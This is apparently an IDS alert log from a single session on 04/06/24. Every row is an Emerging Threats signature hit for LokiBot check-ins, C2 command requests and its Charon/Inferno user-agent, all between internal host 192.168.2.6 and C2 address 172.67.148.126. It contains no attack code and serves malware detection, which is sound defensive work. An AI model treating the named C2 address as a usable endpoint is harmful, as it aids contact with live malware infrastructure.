04/06/24-09:29:42.690473	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.096160	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49833	80	192.168.2.6	172.67.148.126
04/06/24-09:29:43.454363	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.6	172.67.148.126
04/06/24-09:30:53.641650	TCP	2025381	ET TROJAN LokiBot Checkin	49835	80	192.168.2.6	172.67.148.126
04/06/24-09:30:54.422589	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49836	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.042075	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49824	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.115114	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.6	172.67.148.126
04/06/24-09:29:43.454363	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.6	172.67.148.126
04/06/24-09:30:33.437852	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49809	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.018070	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.6	172.67.148.126
04/06/24-09:30:54.422589	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49836	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.998033	TCP	2025381	ET TROJAN LokiBot Checkin	49838	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.096160	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49833	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.112021	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.891670	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.6	172.67.148.126
04/06/24-09:30:32.673178	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.124910	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49773	80	192.168.2.6	172.67.148.126
04/06/24-09:31:15.463121	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49862	80	192.168.2.6	172.67.148.126
04/06/24-09:29:25.556361	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.112021	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.6	172.67.148.126
04/06/24-09:30:42.736556	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49821	80	192.168.2.6	172.67.148.126
04/06/24-09:30:41.966393	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.206380	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49849	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.895022	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.6	172.67.148.126
04/06/24-09:29:25.556361	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.6	172.67.148.126
04/06/24-09:30:41.966393	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49820	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.035047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.6	172.67.148.126
04/06/24-09:30:43.503603	TCP	2025381	ET TROJAN LokiBot Checkin	49822	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.206380	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49849	80	192.168.2.6	172.67.148.126
04/06/24-09:31:17.815577	TCP	2025381	ET TROJAN LokiBot Checkin	49863	80	192.168.2.6	172.67.148.126
04/06/24-09:30:32.673178	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.860100	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.860100	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.6	172.67.148.126
04/06/24-09:30:04.359604	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.6	172.67.148.126
04/06/24-09:30:33.437852	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49809	80	192.168.2.6	172.67.148.126
04/06/24-09:29:44.242163	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.220105	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49837	80	192.168.2.6	172.67.148.126
04/06/24-09:31:14.663983	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49861	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.018070	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.6	172.67.148.126
04/06/24-09:30:25.641172	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.6	172.67.148.126
04/06/24-09:29:46.581121	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.123133	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.6	172.67.148.126
04/06/24-09:31:04.659572	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49847	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.123133	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.999341	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49850	80	192.168.2.6	172.67.148.126
04/06/24-09:31:09.316933	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.2.6	172.67.148.126
04/06/24-09:29:47.378472	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.6	172.67.148.126
04/06/24-09:30:54.422589	TCP	2025381	ET TROJAN LokiBot Checkin	49836	80	192.168.2.6	172.67.148.126
04/06/24-09:31:09.316933	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49853	80	192.168.2.6	172.67.148.126
04/06/24-09:30:11.314149	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.6	172.67.148.126
04/06/24-09:30:28.779878	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.6	172.67.148.126
04/06/24-09:30:13.652600	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49784	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.799315	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.6	172.67.148.126
04/06/24-09:30:14.423119	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.891737	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49846	80	192.168.2.6	172.67.148.126
04/06/24-09:30:19.440133	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.6	172.67.148.126
04/06/24-09:29:44.242163	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.6	172.67.148.126
04/06/24-09:31:24.825007	TCP	2025381	ET TROJAN LokiBot Checkin	49872	80	192.168.2.6	172.67.148.126
04/06/24-09:29:31.298967	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.6	172.67.148.126
04/06/24-09:30:43.503603	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49822	80	192.168.2.6	172.67.148.126
04/06/24-09:29:31.298967	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.6	172.67.148.126
04/06/24-09:29:59.690030	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.6	172.67.148.126
04/06/24-09:30:21.735500	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.6	172.67.148.126
04/06/24-09:30:32.673178	TCP	2025381	ET TROJAN LokiBot Checkin	49808	80	192.168.2.6	172.67.148.126
04/06/24-09:31:12.357168	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49858	80	192.168.2.6	172.67.148.126
04/06/24-09:29:52.706701	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.906071	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.6	172.67.148.126
04/06/24-09:29:28.699735	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.6	172.67.148.126
04/06/24-09:30:50.516269	TCP	2025381	ET TROJAN LokiBot Checkin	49831	80	192.168.2.6	172.67.148.126
04/06/24-09:29:57.360186	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.6	172.67.148.126
04/06/24-09:31:12.357168	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49858	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.906071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.861510	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49818	80	192.168.2.6	172.67.148.126
04/06/24-09:29:57.360186	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.6	172.67.148.126
04/06/24-09:30:08.980641	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49776	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.194950	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49870	80	192.168.2.6	172.67.148.126
04/06/24-09:30:04.359604	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.6	172.67.148.126
04/06/24-09:30:26.424765	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.846749	TCP	2025381	ET TROJAN LokiBot Checkin	49856	80	192.168.2.6	172.67.148.126
04/06/24-09:30:33.437852	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49809	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.133120	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.046578	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.6	172.67.148.126
04/06/24-09:30:26.424765	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.998033	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49838	80	192.168.2.6	172.67.148.126
04/06/24-09:29:27.109787	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.6	172.67.148.126
04/06/24-09:30:59.991734	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49841	80	192.168.2.6	172.67.148.126
04/06/24-09:30:01.279270	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49768	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.119856	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49845	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.136720	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49866	80	192.168.2.6	172.67.148.126
04/06/24-09:30:33.437852	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49809	80	192.168.2.6	172.67.148.126
04/06/24-09:29:53.470085	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.6	172.67.148.126
04/06/24-09:31:00.769505	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49842	80	192.168.2.6	172.67.148.126
04/06/24-09:30:47.361321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49827	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.119856	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49845	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.115114	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.860100	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.6	172.67.148.126
04/06/24-09:30:30.339047	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49805	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.205072	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.6	172.67.148.126
04/06/24-09:30:23.301208	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49796	80	192.168.2.6	172.67.148.126
04/06/24-09:30:03.603579	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.6	172.67.148.126
04/06/24-09:30:44.269499	TCP	2025381	ET TROJAN LokiBot Checkin	49823	80	192.168.2.6	172.67.148.126
04/06/24-09:31:18.590588	TCP	2025381	ET TROJAN LokiBot Checkin	49864	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.181654	TCP	2025381	ET TROJAN LokiBot Checkin	49828	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.080334	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49855	80	192.168.2.6	172.67.148.126
04/06/24-09:30:09.757970	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.6	172.67.148.126
04/06/24-09:30:39.686953	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49819	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.220105	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49837	80	192.168.2.6	172.67.148.126
04/06/24-09:31:22.429106	TCP	2025381	ET TROJAN LokiBot Checkin	49869	80	192.168.2.6	172.67.148.126
04/06/24-09:30:36.516498	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49814	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.220105	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49837	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.096160	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49833	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.036927	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.6	172.67.148.126
04/06/24-09:30:59.991734	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49841	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.042075	TCP	2025381	ET TROJAN LokiBot Checkin	49824	80	192.168.2.6	172.67.148.126
04/06/24-09:30:59.991734	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49841	80	192.168.2.6	172.67.148.126
04/06/24-09:31:12.357168	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49858	80	192.168.2.6	172.67.148.126
04/06/24-09:29:36.488685	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.046578	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49769	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.096911	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.6	172.67.148.126
04/06/24-09:30:26.424765	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49800	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.957388	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49829	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.998033	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49838	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.907030	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49867	80	192.168.2.6	172.67.148.126
04/06/24-09:30:46.592042	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49826	80	192.168.2.6	172.67.148.126
04/06/24-09:29:48.178974	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.6	172.67.148.126
04/06/24-09:30:53.641650	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.998033	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49838	80	192.168.2.6	172.67.148.126
04/06/24-09:30:00.493399	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.814837	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.203747	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.194950	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49870	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.957388	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49829	80	192.168.2.6	172.67.148.126
04/06/24-09:30:03.603579	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.6	172.67.148.126
04/06/24-09:31:14.663983	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49861	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.204192	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.897343	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49860	80	192.168.2.6	172.67.148.126
04/06/24-09:30:37.305241	TCP	2025381	ET TROJAN LokiBot Checkin	49815	80	192.168.2.6	172.67.148.126
04/06/24-09:30:00.493399	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.6	172.67.148.126
04/06/24-09:30:04.359604	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49772	80	192.168.2.6	172.67.148.126
04/06/24-09:30:01.279270	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.206380	TCP	2025381	ET TROJAN LokiBot Checkin	49849	80	192.168.2.6	172.67.148.126
04/06/24-09:29:37.260471	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.203747	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49801	80	192.168.2.6	172.67.148.126
04/06/24-09:31:11.610579	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49857	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.081982	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.6	172.67.148.126
04/06/24-09:31:01.546959	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.6	172.67.148.126
04/06/24-09:29:37.260471	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.920859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.6	172.67.148.126
04/06/24-09:30:57.593507	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49840	80	192.168.2.6	172.67.148.126
04/06/24-09:29:30.251229	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.6	172.67.148.126
04/06/24-09:31:11.610579	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49857	80	192.168.2.6	172.67.148.126
04/06/24-09:31:17.815577	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49863	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.814837	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.6	172.67.148.126
04/06/24-09:30:57.593507	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49840	80	192.168.2.6	172.67.148.126
04/06/24-09:30:01.279270	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.6	172.67.148.126
04/06/24-09:29:33.293191	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.6	172.67.148.126
04/06/24-09:29:46.581121	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.112021	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49788	80	192.168.2.6	172.67.148.126
04/06/24-09:30:22.504191	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.6	172.67.148.126
04/06/24-09:31:00.769505	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49842	80	192.168.2.6	172.67.148.126
04/06/24-09:29:33.293191	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.6	172.67.148.126
04/06/24-09:30:35.733011	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.6	172.67.148.126
04/06/24-09:30:46.592042	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49826	80	192.168.2.6	172.67.148.126
04/06/24-09:29:28.699735	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.6	172.67.148.126
04/06/24-09:31:19.370644	TCP	2025381	ET TROJAN LokiBot Checkin	49865	80	192.168.2.6	172.67.148.126
04/06/24-09:29:28.699735	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.6	172.67.148.126
04/06/24-09:30:03.603579	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49771	80	192.168.2.6	172.67.148.126
04/06/24-09:30:23.301208	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.907030	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49867	80	192.168.2.6	172.67.148.126
04/06/24-09:30:13.652600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.970310	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.6	172.67.148.126
04/06/24-09:30:35.733011	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49812	80	192.168.2.6	172.67.148.126
04/06/24-09:31:21.669304	TCP	2025381	ET TROJAN LokiBot Checkin	49868	80	192.168.2.6	172.67.148.126
04/06/24-09:30:10.531874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.6	172.67.148.126
04/06/24-09:30:23.301208	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.6	172.67.148.126
04/06/24-09:30:56.772335	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49839	80	192.168.2.6	172.67.148.126
04/06/24-09:29:40.344957	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.861151	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.961991	TCP	2025381	ET TROJAN LokiBot Checkin	49871	80	192.168.2.6	172.67.148.126
04/06/24-09:30:56.772335	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49839	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.975531	TCP	2025381	ET TROJAN LokiBot Checkin	49811	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.801533	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49825	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.136720	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49866	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.119856	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49845	80	192.168.2.6	172.67.148.126
04/06/24-09:31:08.547895	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.136720	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49866	80	192.168.2.6	172.67.148.126
04/06/24-09:29:39.580792	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.920859	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49756	80	192.168.2.6	172.67.148.126
04/06/24-09:29:29.470677	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.6	172.67.148.126
04/06/24-09:29:39.580792	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.862546	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.921065	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.907019	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.801533	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49825	80	192.168.2.6	172.67.148.126
04/06/24-09:31:05.441892	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49848	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.081982	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49797	80	192.168.2.6	172.67.148.126
04/06/24-09:29:52.706701	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49757	80	192.168.2.6	172.67.148.126
04/06/24-09:29:42.690473	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.998033	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.970310	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.6	172.67.148.126
04/06/24-09:29:43.454363	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.6	172.67.148.126
04/06/24-09:30:57.593507	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49840	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.812911	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.6	172.67.148.126
04/06/24-09:29:42.690473	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.6	172.67.148.126
04/06/24-09:30:06.739588	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.6	172.67.148.126
04/06/24-09:31:15.463121	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49862	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.203747	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.6	172.67.148.126
04/06/24-09:31:24.825007	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49872	80	192.168.2.6	172.67.148.126
04/06/24-09:31:15.463121	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49862	80	192.168.2.6	172.67.148.126
04/06/24-09:30:06.739588	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49775	80	192.168.2.6	172.67.148.126
04/06/24-09:30:33.437852	TCP	2025381	ET TROJAN LokiBot Checkin	49809	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.846749	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49856	80	192.168.2.6	172.67.148.126
04/06/24-09:29:37.260471	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49739	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.203747	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.081982	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.6	172.67.148.126
04/06/24-09:29:25.556361	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.181654	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.2.6	172.67.148.126
04/06/24-09:29:43.454363	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49747	80	192.168.2.6	172.67.148.126
04/06/24-09:31:07.768549	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49851	80	192.168.2.6	172.67.148.126
